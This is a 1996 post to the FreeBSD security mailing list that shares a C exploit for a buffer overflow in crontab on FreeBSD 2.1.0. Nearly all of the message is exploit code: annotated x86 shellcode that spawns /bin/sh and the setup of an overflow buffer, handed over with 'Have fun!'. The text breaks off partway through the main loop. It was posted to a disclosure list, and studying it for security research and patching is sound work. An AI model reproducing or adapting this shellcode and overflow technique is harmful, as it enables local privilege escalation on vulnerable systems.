From owner-freebsd-security Mon Dec 16 02:06:14 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id CAA16129 for security-outgoing; Mon, 16 Dec 1996 02:06:14 -0800 (PST) Received: from xkis.kis.ru (root@xkis.kis.ru [194.87.66.200]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id CAA16120 for ; Mon, 16 Dec 1996 02:06:06 -0800 (PST) Received: from localhost (dv@localhost) by xkis.kis.ru (8.8.3/8.8.3) with SMTP id NAA14434 for ; Mon, 16 Dec 1996 13:04:33 +0300 (MSK) Date: Mon, 16 Dec 1996 13:04:33 +0300 (MSK) From: Dmitry Valdov To: freebsd-security@freebsd.org Subject: crontab security hole exploit Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Hello! Exploit for buffer overflow in crontab. /* ---------------------------- CUT HERE ----------------------------------- */ /* */ /* Hi ! */ /* This is buffer overflow exploit for crontab bug (FreeBSD 2.1.0). */ /* If you have any problems with it, drop me a letter. */ /* Have fun ! */ /* */ /* */ /* ---------------------- */ /* --------------------------------------------- */ /* ----------------- Dedicated to my beautiful lady ------------------ */ /* --------------------------------------------- */ /* ---------------------- */ /* */ /* Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su */ #include main() { #define length 353 int i,j; unsigned long start_addr; char *env[]={NULL}; char param_string[length]; char code_string[]= { "\xeb\x2a" /* jmp cont */ /* geteip: */ "\x5d" /* popl %ebp */ "\x55" /* pushl %ebp */ "\xfe\x4d\xe7" /* decb 0xffffffe7(%ebp) */ "\xfe\x4d\xeb" /* decb 0xffffffeb(%ebp) */ "\xfe\x4d\xec" /* decb 0xffffffec(%ebp) */ "\xfe\x4d\xed" /* decb 0xffffffed(%ebp) */ "\xff\x45\xef" /* incl 0xffffffef(%ebp) */ "\xfe\x4d\xf4" /* decb 0xfffffff4(%ebp) */ "\xc3" /* ret */ /* 0xffffffe0(%ebp): */ "/bin/sh" /* 0xffffffe7(%ebp): */ "\x01" /* execve: */ "\x8d\x05\x3b\x01\x01\x01" /* leal 0x3b,%eax */ "\x9a\xff\xff\xff\xff\x07\x01" /* lcall 0x7,0x0 */ /* cont: */ "\xc7\xc4XXXX" /* movl $0xXXXXXXXX,%esp */ "\xe8\xcb\xff\xff\xff" /* call geteip */ "\x81\xc5\xef\xff\xff\xff" /* addl $0xffffffef,%ebp */ "\x55" /* pushl %ebp */ "\x55" /* pushl %ebp */ "\x81\xc5\xf1\xff\xff\xff" /* addl $0xfffffff1,%ebp */ "\x55" /* pushl %ebp */ "\xe8\xd4\xff\xff\xff" /* call execve */ }; for(i=0;i